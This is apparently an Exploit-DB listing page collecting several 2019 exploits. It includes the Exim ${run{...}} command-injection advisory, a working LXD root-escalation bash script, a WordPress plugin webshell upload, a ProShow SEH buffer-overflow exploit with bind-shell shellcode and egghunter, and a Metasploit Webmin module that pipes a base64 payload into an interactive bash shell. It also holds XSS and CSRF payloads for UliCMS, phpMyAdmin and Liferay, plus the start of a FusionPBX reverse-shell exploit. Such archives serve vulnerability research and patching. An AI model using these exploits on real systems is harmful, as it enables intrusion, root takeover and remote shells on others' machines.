EXPERIMENTAL_EVENT became #ifndef DISABLE_EVENT; and older versions may also be vulnerable if EXPERIMENTAL_EVENT was enabled manually. Surprisingly, this vulnerability was fixed in version 4.92 (released on February 10, 2019): https://github.com/Exim/exim/commit/7ea1237c783e380d7bdb8... 
https://bugs.exim.org/show_bug.cgi?id=2310 but was not identified as a security vulnerability, and most operating systems are therefore affected. For example, we exploit an up-to-date Debian distribution (9.9) in this advisory. ======================================================================== Local exploitation ======================================================================== The vulnerable code is located in deliver_message(): 6122 #ifndef DISABLE_EVENT 6123 if (process_recipients != RECIP_ACCEPT) 6124 { 6125 uschar * save_local = deliver_localpart; 6126 const uschar * save_domain = deliver_domain; 6127 6128 deliver_localpart = expand_string( 6129 string_sprintf("${local_part:%s}", new->address)); 6130 deliver_domain = expand_string( 6131 string_sprintf("${domain:%s}", new->address)); 6132 6133 (void) event_raise(event_action, 6134 US"msg:fail:internal", new->message); 6135 6136 deliver_localpart = save_local; 6137 deliver_domain = save_domain; 6138 } 6139 #endif Because expand_string() recognizes the "${run{<command> <args>}}" expansion item, and because new->address is the recipient of the mail that is being delivered, a local attacker can simply send a mail to "${run{...}}@localhost" (where "localhost" is one of Exim's local_domains) and execute arbitrary commands, as root (deliver_drop_privilege is false, by default): [...] ======================================================================== Remote exploitation ======================================================================== Our local-exploitation method does not work remotely, because the "verify = recipient" ACL (Access-Control List) in Exim's default configuration requires the local part of the recipient's address (the part that precedes the @ sign) to be the name of a local user: [...] 
------------------------------------------------------------------------ Non-default configurations ------------------------------------------------------------------------ We eventually devised an elaborate method for exploiting Exim remotely in its default configuration, but we first identified various non-default configurations that are easy to exploit remotely: - If the "verify = recipient" ACL was removed manually by an administrator (maybe to prevent username enumeration via RCPT TO), then our local-exploitation method also works remotely. - If Exim was configured to recognize tags in the local part of the recipient's address (via "local_part_suffix = +* : -*" for example), then a remote attacker can simply reuse our local-exploitation method with an RCPT TO "balrog+${run{...}}@localhost" (where "balrog" is the name of a local user). - If Exim was configured to relay mail to a remote domain, as a secondary MX (Mail eXchange), then a remote attacker can simply reuse our local-exploitation method with an RCPT TO "${run{...}}@khazad.dum" (where "khazad.dum" is one of Exim's relay_to_domains). Indeed, the "verify = recipient" ACL can only check the domain part of a remote address (the part that follows the @ sign), not the local part. ------------------------------------------------------------------------ Default configuration ------------------------------------------------------------------------ [...] ======================================================================== Acknowledgments ======================================================================== We thank Exim's developers, Solar Designer, and the members of distros@openwall. 
"The Return of the WIZard" is a reference to Sendmail's ancient WIZ and DEBUG vulnerabilities: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0145 https://seclists.org/bugtraq/1995/Feb/56 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0095 http://www.cheswick.com/ches/papers/berferd.pdf ======================================================================== Timeline ======================================================================== 2019-05-27: Advisory sent to security@exim. 2019-05-28: Advisory sent to distros@openwall.
-
Microsoft Windows - AppX Deployment Service Local Privilege Escalation (3)
CVE-2019-0841 BYPASS #2 There is a second bypass for CVE-2019-0841. This can be triggered as follows: Delete all files and subfolders within "c:\users\%username%\appdata\local\packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\" (at least the ones we can delete as user) Try to launch edge. It will crash the first time. When we launch it a second time, it will write the DACL while impersonating "SYSTEM". The trick here is to launch edge by clicking it on the taskbar or desktop, using "start microsoft-edge:" seems to result in correct impersonation. You can still do this completely programmatically.. since edge will always be in the same position in the task bar.. *cough* sendinput *cough*. There are probably other ways too. Another note, this bug is most definitely not restricted to edge. This will be triggered with other packages too. So you can definitely figure out a way to trigger this bug silently without having edge pop up. Or you could probably minimize edge as soon as it launches and close it as soon as the bug completes. I think it will also trigger by just launching edge once, but sometimes you may have to wait a little. I didn't do extensive testing.. found this bug and quickly wrote up a poc, took me like 2 hours total, finding LPEs is easy. To repro: 1. Launch my poc 2. Launch edge several times Use video demo as guidance. Also, I don't get paid for dropping bugs, so if you want a simple and full exploit, then go fucking write it yourself, I have better things to do, such as preparing my voyage into the arctic. You're welcome. !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!IMPORTANT!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! Make sure you have multiple cores in your VM (not multiple processors, multiple cores). It's going to increase the thread priority to increase our odds of winning the race condition that this exploits. If your VM freezes it means you either have 1 core or set your vm to have multiple processors instead of multiple cores... 
which will also cause it to lock up. EDB Note: Download ~ https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/46976.zip
-
UliCMS 2019.1 'Spitting Lama' - Persistent Cross-Site Scripting
# Exploit Title: UliCMS 2019.1 "Spitting Lama" - Stored Cross-Site Scripting # Google Dork: intext:"by UliCMS" # Date: 2019-05-12 # Exploit Author: Unk9vvN # Vendor Homepage: https://en.ulicms.de # Software Link: https://www.ulicms.de/aktuelles.html?single=ulicms-20191-spitting-lama-ist-fertig # Version: 2019.1 # Tested on: Kali Linux # CVE : CVE-2019-11398 # Description # This vulnerability requires an authenticated session and is located in the CMS management panel; it is a stored XSS, and the vulnerable parameters are as follows. # Vuln One # URI: POST /ulicms/admin/index.php?action=languages # Parameter: name="><script>alert('UNK9VVN')</script> # Vuln Two # URI: POST /ulicms/admin/index.php?action=pages_edit&page=23 # Parameter: systemname="><script>alert('UNK9VVN')</script> # # PoC POST (Cross Site Scripting Stored) # POST /ulicms/admin/index.php HTTP/1.1 Host: XXXXXXXX.ngrok.io User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://XXXXXXXX.ngrok.io/ulicms/admin/index.php?action=languages Content-Type: application/x-www-form-urlencoded Content-Length: 165 Cookie: 5cfc346c4b87e_SESSION=mm4j0oak7boshm2fsn5ttimip8 Connection: close Upgrade-Insecure-Requests: 1 DNT: 1 csrf_token=c95ab2823eccb876804606aa6c60f4d9&sClass=LanguageController&sMethod=create&language_code=U9N&name=%22%3E%3Cscript%3Ealert%28%27UNK9VVN%27%29%3C%2Fscript%3E # # PoC POST (Cross Site Scripting Stored) # POST /ulicms/admin/index.php HTTP/1.1 Host: XXXXXXXX.ngrok.io User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://XXXXXXXX.ngrok.io/ulicms/admin/index.php?action=pages_edit&page=23 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest 
Content-Length: 904 Cookie: 5cfc346c4b87e_SESSION=mm4j0oak7boshm2fsn5ttimip8 Connection: close DNT: 1 csrf_token=c95ab2823eccb876804606aa6c60f4d9&sClass=PageController&sMethod=edit&edit_page=edit_page&page_id=23&systemname=%22%3E%3Cscript%3Ealert%28%27UNK9VVN%27%29%3C%2Fscript%3E&page_title=UNK9VVN&alternate_title=assdasdasd&show_headline=1&type=page&language=en&menu=top&position=0&parent=NULL&activated=1&target=_self&hidden=0&category=1&menu_image=&redirection=&link_to_language=&meta_description=&meta_keywords=&article_author_name=&article_author_email=&comment_homepage=&article_date=2019-06-09T00%3A40%3A01&excerpt=&og_title=&og_description=&og_type=&og_image=&list_type=null&list_language=&list_category=0&list_menu=&list_parent=NULL&list_order_by=title&list_order_direction=asc&limit=0&list_use_pagination=0&module=null&video=&audio=&image_url=&text_position=before&article_image=&autor=1&group_id=1&comments_enabled=null&cache_control=auto&theme=&access%5B%5D=all&custom_data=%7B%0A%0A%7D&page_content= # Discovered by: t.me/Unk9vvN
-
Ubuntu 18.04 - 'lxd' Privilege Escalation
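#!/usr/bin/env bash
# ----------------------------------
# Authors: Marcelo Vazquez (S4vitar)
#          Victor Lasa (vowkin)
# ----------------------------------
# Step 1: Download build-alpine => wget https://raw.githubusercontent.com/saghul/lxd-alpine-builder/master/build-alpine [Attacker Machine]
# Step 2: Build alpine => bash build-alpine (as root user) [Attacker Machine]
# Step 3: Run this script and you will get root [Victim Machine]
# Step 4: Once inside the container, navigate to /mnt/root to see all resources from the host machine
#
# Precondition: the lxc/lxd commands below only need access to the LXD
# socket, which LXD grants to members of the `lxd` group, so the victim
# account must be in that group (no sudo needed). A container started with
# security.privileged=true and the host's / mounted at /mnt/root gives an
# unconfined root view of the host filesystem.
#
# Usage: ./lxd_privesc.sh -f alpine-*.tar.gz
#        ./lxd_privesc.sh -h

# Print usage and exit with status 1.
function helpPanel(){
  echo -e "\nUsage:"
  echo -e "\t[-f] Filename (.tar.gz alpine file)"
  echo -e "\t[-h] Show this help panel\n"
  exit 1
}

# Import the image, create a privileged container with / mounted at
# /mnt/root, drop into a shell inside it and tear everything down afterwards.
function createContainer(){
  if [ ! -f "$filename" ]; then
    echo "[!] Image file not found: $filename" >&2
    exit 1
  fi
  # One command per line on purpose: `set -o errexit` ignores failures of
  # commands inside an `a && b` list, so the original `import && init` form
  # let the script carry on with no image when the import failed.
  lxc image import "$filename" --alias alpine
  lxd init --auto
  echo -e "[*] Listing images...\n"
  lxc image list
  lxc init alpine privesc -c security.privileged=true
  lxc config device add privesc giveMeRoot disk source=/ path=/mnt/root recursive=true
  lxc start privesc
  # `|| true` so that a non-zero exit status of the interactive shell does
  # not abort the script before cleanup runs and leave the privileged
  # container and the image behind on the victim.
  lxc exec privesc -- sh || true
  cleanup
}

# Stop and delete the container, then remove the imported image.
function cleanup(){
  echo -en "\n[*] Removing container..."
  lxc stop privesc && lxc delete privesc && lxc image delete alpine
  echo " [√]"
}

set -o nounset
set -o errexit

declare -i parameter_enable=0

# "f" takes an argument, "h" does not. The original spec ":f:h:" declared
# -h as argument-taking, so a bare "-h" fell into the silent ":" branch
# and the help panel was never shown.
while getopts ":f:h" arg; do
  case $arg in
    f) filename=$OPTARG && let parameter_enable+=1;;
    h) helpPanel;;
    :) echo "[!] Option -$OPTARG requires an argument" >&2; helpPanel;;
    \?) echo "[!] Unknown option: -$OPTARG" >&2; helpPanel;;
  esac
done

if [ $parameter_enable -ne 1 ]; then
  helpPanel
else
  createContainer
fi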
-
WordPress Plugin Insert or Embed Articulate Content into WordPress - Remote Code Execution
# Exploit Title: Authenticated code execution in `insert-or-embed-articulate-content-into-wordpress` Wordpress plugin
# Description: It is possible to upload and execute a PHP file using the plugin option to upload a zip archive. The archive is extracted into a web-served directory and PHP files inside it are not rejected, so any user allowed to use the upload feature obtains code execution with the web server's privileges.
# Date: June 2019
# Exploit Author: xulchibalraa
# Vendor Homepage: https://wordpress.org/plugins/insert-or-embed-articulate-content-into-wordpress/
# Software Link: https://downloads.wordpress.org/plugin/insert-or-embed-articulate-content-into-wordpress.4.2995.zip
# Version: 4.2995 through 4.2997
# Tested on: Wordpress 5.1.1, PHP 5.6
# CVE : -

## 1. Create a .zip archive with 2 files: index.html, index.php
##    (the PHP line must be single-quoted: inside double quotes the shell expands "$_GET" to an empty string and writes a broken file)

echo "<html>hello</html>" > index.html
echo '<?php echo system($_GET["cmd"]); ?>' > index.php
zip poc.zip index.html index.php

## 2. Log in to wp-admin with any user role that has access to the plugin functionality (by default even the `Contributor` role has access to it)

## 3. Create a new Post -> Select `Add block` -> E-Learning -> Upload the poc.zip -> Insert as: Iframe -> Insert (just like in the tutorial https://youtu.be/knst26fEGCw?t=44 ;)

## 4. Access the webshell from the URL displayed after upload, similar to http://website.com/wp-admin/uploads/articulate_uploads/poc/index.php?cmd=whoami
-
ProShow 9.0.3797 - Local Privilege Escalation
#!/usr/bin/python
# _*_ coding:utf-8 _*_
# Exploit Title: ProShow v9.0.3797 Local Exploit
# Exploit Author: @Yonatan_Correa
# website with details: https://risataim.blogspot.com/2019/06/exploit-local-para-proshow.html
# Vendor Homepage: http://www.photodex.com/ProShow
# Software Link: http://files.photodex.com/release/pspro_90_3797.exe
# Version: v9.0.3797
# Tested on: Windows 7
#
# Writes a file named "load" that, once copied into the ProShow install
# directory and proshow.exe is started, overflows a stack buffer and
# overwrites the SEH chain.  Layout of the generated file (see `todo`):
#
#   "yonayona" + bind-shell shellcode   725 bytes
#   0x41 filler                         9479 bytes  (nSEH lands at offset 10204)
#   nSEH  "\xEB\x06\x90\x90"            short jmp +6 over the handler slot
#   SEH   0x10045f50                    pop/pop/ret (address given by the author)
#   NOP sled (86) + 32-byte egghunter + NOPs (10)
#
# pop/pop/ret returns into nSEH, the short jump lands in the NOP sled and
# the egghunter scans memory for the doubled tag "yonayona", then jumps to
# the shellcode right after it.
#
# NOTE: Python 2 only (print statement; str objects used as byte buffers).
# NOTE(review): the 10204 offset and the suitability of 0x10045f50 are taken
# from the author's notes and were not re-verified here.

from struct import pack

# Usage text printed after the file has been written.
informacion = """
ProShow v9.0.3797
http://www.photodex.com/ProShow

execute exploit
create a file called "load"
copy load "C:\Program Files\Photodex\ProShow Producer\"
"C:\Program Files\Photodex\ProShow Producer\proshow.exe"

And connect nc -nv IP_Host 4444

Testing: Windows 7

@Yonatan_Correa
https://risataim.blogspot.com/2019/06/exploit-local-para-proshow.html
"""

# msfvenom -a x86 --platform windows -p windows/shell_bind_tcp -e x86/alpha_mixed LPORT=4444 EXITFUNC=seh -f c
# Payload size: 717 bytes
# Prefixed with "yonayona": the egg tag the hunter below looks for (it
# compares the 4-byte tag twice in a row, hence the doubling).
shell = "yonayona" + (
    "\x89\xe5\xda\xc2\xd9\x75\xf4\x5a\x4a\x4a\x4a\x4a\x4a\x4a\x4a"
    "\x4a\x4a\x4a\x4a\x43\x43\x43\x43\x43\x43\x37\x52\x59\x6a\x41"
    "\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42"
    "\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x6b"
    "\x4c\x59\x78\x4f\x72\x57\x70\x65\x50\x45\x50\x53\x50\x6d\x59"
    "\x39\x75\x75\x61\x4f\x30\x45\x34\x6c\x4b\x30\x50\x66\x50\x6e"
    "\x6b\x30\x52\x74\x4c\x6e\x6b\x36\x32\x77\x64\x6c\x4b\x72\x52"
    "\x36\x48\x66\x6f\x4c\x77\x42\x6a\x46\x46\x75\x61\x79\x6f\x4e"
    "\x4c\x55\x6c\x50\x61\x51\x6c\x55\x52\x64\x6c\x77\x50\x79\x51"
    "\x38\x4f\x36\x6d\x53\x31\x79\x57\x4a\x42\x49\x62\x42\x72\x42"
    "\x77\x4e\x6b\x32\x72\x64\x50\x4e\x6b\x71\x5a\x55\x6c\x4c\x4b"
    "\x32\x6c\x37\x61\x31\x68\x79\x73\x43\x78\x67\x71\x58\x51\x52"
    "\x71\x4c\x4b\x51\x49\x65\x70\x43\x31\x68\x53\x4c\x4b\x70\x49"
    "\x42\x38\x4a\x43\x47\x4a\x71\x59\x6c\x4b\x76\x54\x6e\x6b\x53"
    "\x31\x4e\x36\x64\x71\x79\x6f\x4c\x6c\x69\x51\x38\x4f\x66\x6d"
    "\x67\x71\x48\x47\x56\x58\x6d\x30\x64\x35\x38\x76\x65\x53\x53"
    "\x4d\x59\x68\x35\x6b\x73\x4d\x65\x74\x54\x35\x58\x64\x72\x78"
    "\x4c\x4b\x52\x78\x46\x44\x76\x61\x58\x53\x35\x36\x4c\x4b\x56"
    "\x6c\x50\x4b\x4e\x6b\x30\x58\x57\x6c\x57\x71\x49\x43\x4e\x6b"
    "\x75\x54\x4e\x6b\x56\x61\x48\x50\x4f\x79\x42\x64\x75\x74\x64"
    "\x64\x61\x4b\x43\x6b\x33\x51\x43\x69\x50\x5a\x73\x61\x69\x6f"
    "\x6b\x50\x63\x6f\x53\x6f\x32\x7a\x6c\x4b\x47\x62\x5a\x4b\x4c"
    "\x4d\x71\x4d\x43\x58\x70\x33\x77\x42\x35\x50\x53\x30\x35\x38"
    "\x63\x47\x43\x43\x34\x72\x61\x4f\x46\x34\x71\x78\x62\x6c\x51"
    "\x67\x67\x56\x73\x37\x39\x6f\x58\x55\x68\x38\x4a\x30\x67\x71"
    "\x33\x30\x35\x50\x76\x49\x78\x44\x46\x34\x36\x30\x62\x48\x46"
    "\x49\x6b\x30\x50\x6b\x65\x50\x79\x6f\x48\x55\x43\x5a\x37\x78"
    "\x50\x59\x62\x70\x5a\x42\x4b\x4d\x51\x50\x70\x50\x73\x70\x30"
    "\x50\x61\x78\x4b\x5a\x44\x4f\x39\x4f\x39\x70\x69\x6f\x68\x55"
    "\x4d\x47\x70\x68\x77\x72\x43\x30\x47\x61\x73\x6c\x4f\x79\x4d"
    "\x36\x52\x4a\x66\x70\x31\x46\x61\x47\x35\x38\x69\x52\x39\x4b"
    "\x44\x77\x73\x57\x69\x6f\x6b\x65\x76\x37\x71\x78\x78\x37\x4a"
    "\x49\x64\x78\x39\x6f\x79\x6f\x79\x45\x62\x77\x62\x48\x54\x34"
    "\x78\x6c\x57\x4b\x79\x71\x79\x6f\x5a\x75\x63\x67\x4e\x77\x33"
    "\x58\x30\x75\x32\x4e\x70\x4d\x33\x51\x59\x6f\x6a\x75\x65\x38"
    "\x53\x53\x50\x6d\x71\x74\x47\x70\x4b\x39\x6a\x43\x61\x47\x76"
    "\x37\x36\x37\x76\x51\x6b\x46\x72\x4a\x37\x62\x52\x79\x63\x66"
    "\x7a\x42\x6b\x4d\x61\x76\x6f\x37\x32\x64\x55\x74\x45\x6c\x76"
    "\x61\x75\x51\x4e\x6d\x43\x74\x77\x54\x34\x50\x49\x56\x47\x70"
    "\x51\x54\x32\x74\x56\x30\x62\x76\x73\x66\x52\x76\x43\x76\x56"
    "\x36\x62\x6e\x50\x56\x71\x46\x53\x63\x51\x46\x61\x78\x52\x59"
    "\x5a\x6c\x67\x4f\x4d\x56\x59\x6f\x6e\x35\x6c\x49\x6d\x30\x70"
    "\x4e\x71\x46\x61\x56\x79\x6f\x44\x70\x45\x38\x56\x68\x4c\x47"
    "\x45\x4d\x75\x30\x6b\x4f\x79\x45\x4d\x6b\x4b\x4e\x76\x6e\x54"
    "\x72\x48\x6a\x35\x38\x59\x36\x5a\x35\x6d\x6d\x6d\x4d\x49\x6f"
    "\x6e\x35\x55\x6c\x36\x66\x43\x4c\x44\x4a\x4d\x50\x59\x6b\x6b"
    "\x50\x72\x55\x75\x55\x6f\x4b\x32\x67\x74\x53\x74\x32\x70\x6f"
    "\x72\x4a\x73\x30\x52\x73\x39\x6f\x59\x45\x41\x41"
)

# 8 (tag) + 717 (shellcode) + 9479 (filler) = 10204 bytes before nSEH.
junk = shell + ("\x41" * 9479)  # 10204

# nSEH: EB 06 = jmp short +6, i.e. over the two trailing NOPs of nSEH and
# the 4-byte SEH slot, straight onto the NOP sled that follows `seh`.
nseh = "\xEB\x06\x90\x90"
seh = pack('<I', 0x10045f50)  # pop pop ret
nop = "\x90" * 86
nop2 = "\x90" * 10

# 32-byte egghunter: push 2 / pop eax / int 0x2e probes each page for
# readability, then `mov eax, "yona"` and two scasd/jne compare the tag at
# [edi]; after a double match `jmp edi` transfers control just past it.
egg = (
    "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
    "\xef\xb8\x79\x6f\x6e\x61\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
)

todo = junk + nseh + seh + nop + egg + nop2

arch = open("load", "wb")
arch.write(todo)
arch.close()

print informacion
print "\nCreated File size " + str(len(todo))
-
phpMyAdmin 4.8 - Cross-Site Request Forgery
# Exploit Title: Cross Site Request Forgery (CSRF)
# Date: 11 June 2019
# Exploit Author: Riemann
# Vendor Homepage: https://www.phpmyadmin.net/
# Software Link: https://www.phpmyadmin.net/downloads/
# Version: 4.8
# Tested on: UBUNTU 16.04 LTS - installed Docker image - docker pull phpmyadmin/phpmyadmin:4.8
# CVE : CVE-2019-12616

# Description
# An issue was discovered in phpMyAdmin before 4.9.0. A vulnerability was found that allows an attacker to trigger a CSRF attack against a phpMyAdmin user. The attacker can trick the user, for instance through a broken <img> tag pointing at the victim's phpMyAdmin database, and the attacker can potentially deliver a payload (such as a specific INSERT or DELETE statement) to the victim.

# VULNERABILITY: The following request, which is a form submission, is sent with the GET method instead of POST, so the SQL statement travels entirely in the URL:

<form method="get" action="index.php" class="disableAjax">

GET http://localhost:9000/tbl_sql.php?sql_query=INSERT+INTO+%60pma__bookmark%60+(%60id%60%2C+%60dbase%60%2C+%60user%60%2C+%60label%60%2C+%60query%60)+VALUES+(DAYOFWEEK(%27%27)%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27)&show_query=1&db=phpmyadmin&table=pma__bookmark HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:67.0) Gecko/20100101 Firefox/67.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Connection: keep-alive
Cookie: pmaCookieVer=5; pma_lang=en; pma_collation_connection=utf8mb4_unicode_ci; pmaUser-1=%7B%22iv%22%3A%22M16ZzlA0rqF9BZ1jFsssjQ%3D%3D%22%2C%22mac%22%3A%22804941d12fceca0997e181cbcb8427d68c668240%22%2C%22payload%22%3A%22mD9juTxAYhC7lA7XPWHWOw%3D%3D%22%7D; phpMyAdmin=9bdd66557e399fc1447bf253bc2dc133
Upgrade-Insecure-Requests: 1
Host: localhost:9000

The attacker can easily create a fake hyperlink (or an <img> tag) containing the request to be executed on behalf of the user; the victim's browser attaches the phpMyAdmin session cookie automatically, so the statement runs with the victim's privileges. Note that the request above carries no per-session token parameter, which is what makes the GET form exploitable cross-site.

#POC
<!doctype html>
<html lang="en">
<head>
<meta
charset="utf-8"> <title>POC CVE-2019-12616</title> </head> <body> <a href="http://localhost:9000/tbl_sql.php?sql_query=INSERT+INTO+`pma__bookmark`+(`id`%2C+`dbase`%2C+`user`%2C+`label`%2C+`query`)+VALUES+(DAYOFWEEK('')%2C+''%2C+''%2C+''%2C+'')&show_query=1&db=phpmyadmin&table=pma__bookmark">View my Pictures!</a> </body> </html>
-
Liferay Portal 7.1 CE GA3 / SimpleCaptcha API - Cross-Site Scripting
# Exploit Title: Liferay Portal < 7.1 CE GA4 / SimpleCaptcha API XSS
# Date: 04/06/2019
# Exploit Author: Valerio Brussani (@val_brux)
# Website: www.valbrux.it
# Vendor Homepage: https://www.liferay.com/
# Software Link: https://www.liferay.com/it/downloads-community
# Version: < 7.1 CE GA4
# Tested on: Liferay Portal 7.1 CE GA3
# CVE: CVE-2019-6588
# Reference1: https://dev.liferay.com/web/community-security-team/known-vulnerabilities/liferay-portal-71/-/asset_publisher/7v4O7y85hZMo/content/cst-7130-multiple-xss-vulnerabilities-in-7-1-ce-ga3
# Reference2: https://www.valbrux.it/blog/2019/06/04/cve-2019-6588-liferay-portal-7-1-ce-ga4-simplecaptcha-api-xss/

Introduction

In Liferay Portal before 7.1 CE GA4, an XSS vulnerability exists in the SimpleCaptcha API when custom code passes unsanitized input into the "url" parameter of the JSP taglib call <liferay-ui:captcha url="<%= url %>" /> or <liferay-captcha:captcha url="<%= url %>" />. A customized Liferay portlet which directly calls the SimpleCaptcha API without sanitizing the input could be susceptible to this vulnerability: the taglib emits the value into an HTML attribute without encoding it, so the caller's input validation is the only barrier on affected releases.

PoC

In a sample scenario of custom code calling the <liferay-ui:captcha url="<%= url %>" /> JSP taglib, appending a payload like the following to the body parameters of a customized form:

&xxxx%22%3e%3cscript%3ealert(1)</script>

The script is reflected in the src attribute of the <img> tag responsible for fetching the next available captcha:

<img alt="xxx" class="xxxx" src="xxxxxx"><script>alert(1)</script>=" />
-
Webmin 1.910 - 'Package Updates' Remote Command Execution (Metasploit)
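##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Webmin Package Updates Remote Command Execution',
      'Description' => %q(
        This module exploits an arbitrary command execution vulnerability in
        Webmin 1.910 and lower versions. Any user authorized to the
        "Package Updates" module can execute arbitrary commands with root
        privileges.
      ),
      'Author' => [
        'AkkuS <Özkan Mustafa Akkuş>' # Vulnerability Discovery, MSF PoC module
      ],
      'License' => MSF_LICENSE,
      'References' => [
        ['CVE', '2019-12840'],
        ['URL', 'https://www.pentest.com.tr/exploits/Webmin-1910-Package-Updates-Remote-Command-Execution.html']
      ],
      'Privileged' => true,
      'Payload' => {
        'DisableNops' => true,
        'Space' => 512,
        'Compat' => { 'PayloadType' => 'cmd' }
      },
      'DefaultOptions' => {
        'RPORT' => 10000,
        'SSL' => false,
        'PAYLOAD' => 'cmd/unix/reverse_perl'
      },
      'Platform' => 'unix',
      'Arch' => ARCH_CMD,
      'Targets' => [['Webmin <= 1.910', {}]],
      'DisclosureDate' => 'May 16 2019',
      'DefaultTarget' => 0))

    register_options [
      OptString.new('USERNAME', [true, 'Webmin Username']),
      OptString.new('PASSWORD', [true, 'Webmin Password']),
      OptString.new('TARGETURI', [true, 'Base path for Webmin application', '/'])
    ]
  end

  # scheme://host:port of the target; used to build a same-origin Referer,
  # presumably to satisfy Webmin's referer check on form posts.
  def peer
    "#{ssl ? 'https://' : 'http://'}#{rhost}:#{rport}"
  end

  # Authenticate through session_login.cgi.
  #
  # Returns the value of the "sid" cookie on success, '' when the server
  # answered but issued no session (bad credentials) and nil when there was
  # no response at all. Callers distinguish the three cases.
  def login
    res = send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, 'session_login.cgi'),
      'cookie' => 'testing=1', # without any cookie Webmin replies "Error - No cookies"
      'vars_post' => {
        'page' => '',
        'user' => datastore['USERNAME'],
        'pass' => datastore['PASSWORD']
      }
    })

    return nil if res.nil?
    return Regexp.last_match(1) if res.code == 302 && res.get_cookies =~ /sid=(\w+)/

    ''
  end

  # Log in, read the version from the sysinfo.cgi banner and, for 1.910 and
  # older, confirm that the account can reach the package-updates module
  # (the precondition for exploitation).
  def check
    cookie = login
    return CheckCode::Detected if cookie == ''
    return CheckCode::Unknown if cookie.nil?

    vprint_status('Logged in, checking the Webmin version...')

    res = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, 'sysinfo.cgi'),
      'cookie' => "sid=#{cookie}",
      'vars_get' => { 'xnavigation' => '1' }
    })

    if res && res.code == 302 && res.body
      banner = res.body.split('- Webmin 1.')[1]
      return CheckCode::Detected if banner.nil?

      minor = banner.split(' ')[0]
      return CheckCode::Detected unless minor =~ /\A\d+\z/

      # Compare numerically: the former string comparison (version <= "910")
      # evaluated "1000" <= "910" as true and flagged newer releases as
      # vulnerable.
      if minor.to_i > 910
        print_status("Webmin 1.#{minor} is not affected")
        return CheckCode::Safe
      end

      res = send_request_cgi({
        'uri' => normalize_uri(target_uri.path, 'package-updates/'),
        'cookie' => "sid=#{cookie}"
      })
      if res && res.code == 200 && res.body =~ /Software Package Update/
        print_status("NICE! #{datastore['USERNAME']} has the right to >>Package Update<<")
        return CheckCode::Vulnerable
      end
    end

    print_error("#{datastore['USERNAME']} doesn't have the right to >>Package Update<<")
    print_status('Please try with another user account!')
    CheckCode::Safe
  end

  def exploit
    cookie = login
    if cookie.nil? || cookie == ''
      fail_with(Failure::NoAccess, 'Failed to retrieve session cookie')
    end
    print_good("Session cookie: #{cookie}")

    # Touch the process-manager page before submitting the update form.
    # NOTE(review): kept from the original PoC; appears to be needed to put
    # the session into the right navigation state -- confirm against Webmin.
    res = send_request_cgi(
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, 'proc', 'index_tree.cgi'),
      'headers' => { 'Referer' => "#{peer}/sysinfo.cgi?xnavigation=1" },
      'cookie' => "sid=#{cookie}"
    )
    unless res && res.code == 200
      fail_with(Failure::Unknown, 'Request failed')
    end

    print_status('Attempting to execute the payload...')
    run_update(cookie)
  end

  # Submit the "Update Selected Packages" form with a second "u" value that
  # starts with " | ": the value ends up in the shell command update.cgi
  # runs, so everything after the pipe executes (as root, per the advisory).
  #
  # The payload is base64-wrapped and uses brace expansion ({echo,...})
  # so that no whitespace or payload-specific characters reach the shell
  # or the URL encoder unescaped.
  def run_update(cookie)
    b64 = Rex::Text.encode_base64(payload.encoded)
    wrapper = "bash -c \"{echo,#{b64}}|{base64,-d}|{bash,-i}\""
    encoded_cmd = Rex::Text.uri_encode(wrapper)

    send_request_cgi({
      'method' => 'POST',
      'cookie' => "sid=#{cookie}",
      'ctype' => 'application/x-www-form-urlencoded',
      'uri' => normalize_uri(target_uri.path, 'package-updates', 'update.cgi'),
      'headers' => { 'Referer' => "#{peer}/package-updates/?xnavigation=1" },
      'data' => "u=acl%2Fapt&u=%20%7C%20#{encoded_cmd}&ok_top=Update+Selected+Packages"
    })
  end
end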
-
FusionPBX 4.4.3 - Remote Command Execution
# Exploit Title: FusionPBX <= 4.4.3 Command Injection RCE via XSS # Date: 06-11-2019 # Exploit Author: Dustin Cobb # Vendor Homepage: https://www.fusionpbx.com # Software Link: https://https://github.com/fusionpbx/fusionpbx # Version: <= 4.4.3 # Tested on: Debian 8.11 # CVE : CVE-2019-11408 (XSS) AND CVE-2019-11409 (Command Injection RCE) #!/usr/bin/python import socket, sys from random import randint from hashlib import md5 # Exploitation steps: # # 1. First, encode an XSS payload that will be injected into the # “Caller ID Number” field, or “User” component of the SIP # “From” URI. # 2. Connect to external SIP profile port and send a SIP INVITE # packet with XSS payload injected into the From Field. # 3. XSS payload will fire operator panel screen (CVE-2019-11408), which # is designed to be monitored constantly by a call center operator. # 4. Once XSS code executes, a call is made to the exec.php script # (CVE-2019-11409) with a reverse shell payload that connects back to # a netcat listener on the attacker system. 
